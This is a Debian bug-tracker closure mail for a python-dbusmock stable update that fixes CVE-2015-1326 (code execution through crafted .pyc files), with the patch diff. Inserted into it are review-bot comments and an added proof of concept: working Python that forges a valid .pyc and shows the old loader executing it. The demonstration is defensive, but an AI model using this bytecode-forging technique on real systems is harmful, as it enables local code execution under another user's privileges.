Your message dated Sat, 06 Jun 2015 13:11:11 +0100
with message-id <1433592671.2987.12.camel@adam-barratt.org.uk>
and subject line Fix released with 8.1 point release
has caused the Debian Bug report #786860,
regarding jessie-pu: package python-dbusmock/0.11.4-1+deb8u1
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact owner@bugs.debian.org
immediately.)

-- 
786860: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=786860
Debian Bug Tracking System
Contact owner@bugs.debian.org with problems
--- Begin Message ---
- To: Debian BTS Submit <submit@bugs.debian.org>
- Cc: Salvatore Bonaccorso <carnil@debian.org>
- Subject: jessie-pu: package python-dbusmock/0.11.4-1+deb8u1
- From: Martin Pitt <mpitt@debian.org>
- Date: Tue, 26 May 2015 09:34:46 +0200
- Message-id: <20150526073446.GK2947@piware.de>
Package: release.debian.org
Severity: normal
Tags: jessie
User: release.debian.org@packages.debian.org
Usertags: pu

Hello,

there is a low-impact security issue in python-dbusmock, which is described in detail on https://launchpad.net/bugs/1453815. I originally prepared a stable-security upload, but the security team (CC'ed Salvatore) asked this to be handled as a normal stable update instead. So I filed https://bugs.debian.org/786858 with a summary and proper version tracking, and uploaded python-dbusmock 0.11.4-1+deb8u1 to stable with the backported fix.

This is fixed in 0.15.1-1 in testing/unstable; oldstable does not have python-dbusmock.

Thanks,

Martin
-- 
Martin Pitt | http://www.piware.de
Ubuntu Developer (www.ubuntu.com) | Debian Developer (www.debian.org)
diff -Nru python-dbusmock-0.11.4/debian/changelog python-dbusmock-0.11.4/debian/changelog --- python-dbusmock-0.11.4/debian/changelog 2014-09-22 10:26:41.000000000 +0200 +++ python-dbusmock-0.11.4/debian/changelog 2015-05-26 09:26:24.000000000 +0200 
@@ -1,3 +1,20 @@ +python-dbusmock (0.11.4-1+deb8u1) stable; urgency=medium + + * SECURITY FIX: When loading a template from an arbitrary file through the + AddTemplate() D-Bus method call or DBusTestCase.spawn_server_template() + Python method, don't create or use Python's *.pyc cached files. By + tricking a user into loading a template from a world-writable directory + like /tmp, an attacker could run arbitrary code with the user's + privileges by putting a crafted .pyc file into that directory. + + Note that this is highly unlikely to actually appear in practice as custom + dbusmock templates are usually shipped in project directories, not + directly in world-writable directories. + (Closes: #786858, LP: #1453815, CVE-2015-1326) + * Add debian/gbp.conf for "jessie" packaging branch. + + -- Martin Pitt <mpitt@debian.org> Tue, 26 May 2015 09:26:11 +0200 + python-dbusmock (0.11.4-1) unstable; urgency=medium * New upstream bug fix release. diff -Nru python-dbusmock-0.11.4/debian/gbp.conf python-dbusmock-0.11.4/debian/gbp.conf --- python-dbusmock-0.11.4/debian/gbp.conf 1970-01-01 01:00:00.000000000 +0100 +++ python-dbusmock-0.11.4/debian/gbp.conf 2015-05-26 09:26:24.000000000 +0200 @@ -0,0 +1,2 @@ +[DEFAULT] +debian-branch = jessie diff -Nru python-dbusmock-0.11.4/debian/patches/0001-SECURITY-FIX-Prevent-code-execution-through-crafted-.patch python-dbusmock-0.11.4/debian/patches/0001-SECURITY-FIX-Prevent-code-execution-through-crafted-.patch --- python-dbusmock-0.11.4/debian/patches/0001-SECURITY-FIX-Prevent-code-execution-through-crafted-.patch 1970-01-01 01:00:00.000000000 +0100 +++ python-dbusmock-0.11.4/debian/patches/0001-SECURITY-FIX-Prevent-code-execution-through-crafted-.patch 2015-05-26 09:26:24.000000000 +0200 
@@ -0,0 +1,75 @@ +From: Martin Pitt <martin.pitt@ubuntu.com> +Date: Mon, 11 May 2015 16:00:10 +0200 +Subject: SECURITY FIX: Prevent code execution through crafted pyc files + +When loading a template from an arbitrary file through the AddTemplate() D-Bus +method call or DBusTestCase.spawn_server_template() Python method, don't create +or use Python's *.pyc cached files.By tricking a user into loading a template +from a world-writable directory like /tmp, an attacker could run arbitrary code +with the user's privileges by putting a crafted .pyc file into that directory. + +Note that this is highly unlikely to actually appear in practice as custom +dbusmock templates are usually shipped in project directories, not directly in +world-writable directories. + +Thanks to Simon McVittie for discovering this! + +LP: #1453815 +CVE-2015-1326 +--- + dbusmock/mockobject.py | 13 +++++-------- + tests/test_api.py | 10 ++++++++++ + 2 files changed, 15 insertions(+), 8 deletions(-) + +diff --git a/dbusmock/mockobject.py b/dbusmock/mockobject.py +index 0228070..6d35608 100644 +--- a/dbusmock/mockobject.py ++++ b/dbusmock/mockobject.py +@@ -17,6 +17,7 @@ import time + import sys + import types + import importlib ++import imp + from xml.etree import ElementTree + + # we do not use this ourselves, but mock methods often want to use this +@@ -40,14 +41,10 @@ if sys.version_info[0] >= 3: + + def load_module(name): + if os.path.exists(name) and os.path.splitext(name)[1] == '.py': +- sys.path.insert(0, os.path.dirname(os.path.abspath(name))) +- try: +- m = os.path.splitext(os.path.basename(name))[0] +- module = importlib.import_module(m) +- finally: +- sys.path.pop(0) +- +- return module ++ mod = imp.new_module(os.path.splitext(os.path.basename(name))[0]) ++ with open(name) as f: ++ exec(f.read(), mod.__dict__, mod.__dict__) ++ return mod + + return importlib.import_module('dbusmock.templates.' 
+ name) + +diff --git a/tests/test_api.py b/tests/test_api.py +index 57f0a62..7b8c126 100644 +--- a/tests/test_api.py ++++ b/tests/test_api.py +@@ -582,6 +582,16 @@ def load(mock, parameters): + self.addCleanup(p_mock.terminate) + self.addCleanup(p_mock.stdout.close) + ++ # ensure that we don't use/write any .pyc files, they are dangerous ++ # in a world-writable directory like /tmp ++ self.assertFalse(os.path.exists(my_template.name + 'c')) ++ try: ++ from importlib.util import cache_from_source ++ self.assertFalse(os.path.exists(cache_from_source(my_template.name))) ++ except ImportError: ++ # python < 3.4 ++ pass ++ + self.assertEqual(dbus_ultimate.Answer(), 42) + + # should appear in introspection diff -Nru python-dbusmock-0.11.4/debian/patches/series python-dbusmock-0.11.4/debian/patches/series --- python-dbusmock-0.11.4/debian/patches/series 1970-01-01 01:00:00.000000000 +0100 +++ python-dbusmock-0.11.4/debian/patches/series 2015-05-26 09:26:24.000000000 +0200 @@ -0,0 +1 @@ +0001-SECURITY-FIX-Prevent-code-execution-through-crafted-.patchAttachment: signature.asc
Description: Digital signature
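Review bot: in the `dbusmock/mockobject.py` import hunk, `+import imp` adds a dependency on a module that is deprecated from Python 3.4 (jessie's python3) and warns on import, while `import types` is already present four lines above it in the same hunk's context; `types.ModuleType(name)` creates the same empty module object as `imp.new_module(name)` on both Python 2 and 3, so the new import can be dropped and the `load_module` hunk changed to `mod = types.ModuleType(os.path.splitext(os.path.basename(name))[0])`.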
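Review bot: in the `load_module` hunk, `exec(f.read(), mod.__dict__, mod.__dict__)` compiles the template with no filename, so a `SyntaxError` or a traceback from inside a template names `<string>` rather than the template path, and `with open(name) as f:` on Python 3 decodes the file in the locale encoding, which ignores any PEP 263 coding cookie in the template. Opening the file with `'rb'` and running `exec(compile(f.read(), name, 'exec'), mod.__dict__)` keeps the no-.pyc property (compile() of in-memory source never touches the cache) while fixing both, and a single namespace argument is enough since globals and locals are the same dict. Separately, dropping the `sys.path.insert(0, ...)` lines is a behaviour change worth a sentence in the changelog entry: a template that imports a helper module sitting next to it no longer finds it, and the module returned here is not registered in `sys.modules` and has no `__file__`.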
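Review bot: the two `assertFalse(os.path.exists(...))` checks added to `tests/test_api.py` only show that loading the template wrote no cache file; they pass equally against the old `importlib.import_module` code whenever `PYTHONDONTWRITEBYTECODE` is set, and they never exercise the attack the fix is for, which is reading a cache file that is already there. A regression test that actually fails on the old code would plant a stale `.pyc` (compiled from a template whose `Answer()` returns something other than 42, with the real template's mtime and size in its header) at `cache_from_source(my_template.name)` and, on Python 2, at `my_template.name + 'c'` before spawning the server, and then keep the existing `self.assertEqual(dbus_ultimate.Answer(), 42)` as the proof that the planted bytecode was ignored.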
--- End Message ---
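The mechanism the commit message above describes, as an added example that is not part of the python-dbusmock patch or of this bug report: a template in a world-writable directory is loaded once with the pre-fix pattern (directory pushed onto sys.path, then importlib.import_module), an attacker who can only stat the .py then drops a .pyc whose header copies the source's mtime and size into the cache slot the import system consults, and the next pre-fix load runs the attacker's bytecode while the post-fix pattern (read the source, exec it into a fresh module) does not. The helper names vulnerable_load, hardened_load, craft_pyc and demo, the module name dbusmock_demo_template and the two template sources are this example's own constructions, not dbusmock API; the cache header layout is CPython's timestamp-based .pyc format, with the flags word that PEP 552 added in 3.7.

```python
"""Added example, not code from python-dbusmock: forge a timestamp-validated
.pyc for a template in a scratch directory and show that the pre-fix loader
executes it while the post-fix loader ignores it.  Python 3 only."""
import importlib
import importlib.util
import marshal
import os
import shutil
import struct
import sys
import tempfile
import types

TEMPLATE_NAME = "dbusmock_demo_template"   # module name chosen for this example
TEMPLATE_SRC = "ANSWER = 42\n"             # constructed 'honest' template source
ATTACKER_SRC = "ANSWER = 'pwned'\n"        # constructed attacker payload


def vulnerable_load(path):
    """Pre-fix dbusmock pattern: put the template's directory on sys.path and
    import it by name, so the import system reads (and writes) __pycache__.
    The sys.modules.pop() and invalidate_caches() calls are demo scaffolding
    so that a second call really re-imports instead of returning the cached
    module object."""
    sys.path.insert(0, os.path.dirname(os.path.abspath(path)))
    try:
        name = os.path.splitext(os.path.basename(path))[0]
        sys.modules.pop(name, None)
        importlib.invalidate_caches()
        return importlib.import_module(name)
    finally:
        sys.path.pop(0)


def hardened_load(path):
    """Post-fix pattern: compile the source text and exec it into a fresh
    module.  No bytecode cache is consulted or written.  types.ModuleType
    replaces the deprecated imp.new_module, and compile() with the real path
    keeps tracebacks pointing at the template file."""
    mod = types.ModuleType(os.path.splitext(os.path.basename(path))[0])
    mod.__file__ = path
    with open(path, "rb") as f:            # bytes, so a coding cookie is honoured
        code = compile(f.read(), path, "exec")
    exec(code, mod.__dict__)
    return mod


def craft_pyc(source_path, payload_src):
    """Attacker step: write payload_src's bytecode into the cache slot for
    source_path, copying the source's mtime and size into the header so the
    import system's timestamp validation accepts it.  Only stat() access to
    the .py and write access to the directory are needed."""
    st = os.stat(source_path)
    code = compile(payload_src, source_path, "exec")
    header = importlib.util.MAGIC_NUMBER
    if sys.version_info >= (3, 7):
        header += struct.pack("<I", 0)     # PEP 552 flags: 0 = timestamp-based
    header += struct.pack("<II", int(st.st_mtime) & 0xFFFFFFFF,
                          st.st_size & 0xFFFFFFFF)
    pyc_path = importlib.util.cache_from_source(source_path)
    os.makedirs(os.path.dirname(pyc_path), exist_ok=True)
    with open(pyc_path, "wb") as f:
        f.write(header + marshal.dumps(code))
    return pyc_path


def demo():
    """Run the attack against both loaders and return what each observed."""
    tmp = tempfile.mkdtemp()                # stands in for a world-writable /tmp
    path = os.path.join(tmp, TEMPLATE_NAME + ".py")
    with open(path, "w") as f:
        f.write(TEMPLATE_SRC)
    result = {}
    result["vulnerable_before"] = vulnerable_load(path).ANSWER   # 42
    pyc = craft_pyc(path, ATTACKER_SRC)     # attacker plants forged bytecode
    result["pyc_exists"] = os.path.exists(pyc)
    result["vulnerable_after"] = vulnerable_load(path).ANSWER    # 'pwned'
    result["hardened_after"] = hardened_load(path).ANSWER        # 42
    shutil.rmtree(tmp, ignore_errors=True)
    return result


if __name__ == "__main__":
    print(demo())
```

The magic number in the header ties a .pyc to one CPython release, so the forgery has to be built with the interpreter the victim runs; that is no obstacle for a local attacker on the same machine, which is why the commit message treats a world-writable template directory as a code-execution path rather than a hardening nicety. Note that `importlib.util.cache_from_source` honours `sys.pycache_prefix`, so the forged file lands wherever the import system will actually look, and that the hardened loader still executes whatever the .py contains: the fix removes the cache as an injection vector, it does not make arbitrary template files safe.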
--- Begin Message ---
- To: 781276-done@bugs.debian.org
- Cc: 781284-done@bugs.debian.org, 782900-done@bugs.debian.org, 783256-done@bugs.debian.org, 783404-done@bugs.debian.org, 783488-done@bugs.debian.org, 783489-done@bugs.debian.org, 783526-done@bugs.debian.org, 783722-done@bugs.debian.org, 783750-done@bugs.debian.org, 783811-done@bugs.debian.org, 783884-done@bugs.debian.org, 783973-done@bugs.debian.org, 784101-done@bugs.debian.org, 784178-done@bugs.debian.org, 784342-done@bugs.debian.org, 784383-done@bugs.debian.org, 784644-done@bugs.debian.org, 784714-done@bugs.debian.org, 784800-done@bugs.debian.org, 784801-done@bugs.debian.org, 784815-done@bugs.debian.org, 784816-done@bugs.debian.org, 784905-done@bugs.debian.org, 784943-done@bugs.debian.org, 784946-done@bugs.debian.org, 784962-done@bugs.debian.org, 784963-done@bugs.debian.org, 784964-done@bugs.debian.org, 784998-done@bugs.debian.org, 785154-done@bugs.debian.org, 785184-done@bugs.debian.org, 785201-done@bugs.debian.org, 785240-done@bugs.debian.org, 785254-done@bugs.debian.org, 785298-done@bugs.debian.org, 785301-done@bugs.debian.org, 785386-done@bugs.debian.org, 785478-done@bugs.debian.org, 785510-done@bugs.debian.org, 785523-done@bugs.debian.org, 785713-done@bugs.debian.org, 785718-done@bugs.debian.org, 786388-done@bugs.debian.org, 786389-done@bugs.debian.org, 786431-done@bugs.debian.org, 786513-done@bugs.debian.org, 786647-done@bugs.debian.org, 786720-done@bugs.debian.org, 786744-done@bugs.debian.org, 786811-done@bugs.debian.org, 786812-done@bugs.debian.org, 786856-done@bugs.debian.org, 786860-done@bugs.debian.org, 786863-done@bugs.debian.org, 786870-done@bugs.debian.org, 786912-done@bugs.debian.org, 786918-done@bugs.debian.org, 786922-done@bugs.debian.org, 786924-done@bugs.debian.org, 786982-done@bugs.debian.org, 787008-done@bugs.debian.org, 787014-done@bugs.debian.org, 787255-done@bugs.debian.org, 787260-done@bugs.debian.org, 787626-done@bugs.debian.org, 787636-done@bugs.debian.org
- Subject: Fix released with 8.1 point release
- From: "Adam D. Barratt" <adam@adam-barratt.org.uk>
- Date: Sat, 06 Jun 2015 13:11:11 +0100
- Message-id: <1433592671.2987.12.camel@adam-barratt.org.uk>
Version: 8.1

Hi,

The fix discussed in this bug was released to stable as part of the 8.1 point release earlier today.

Regards,

Adam
--- End Message ---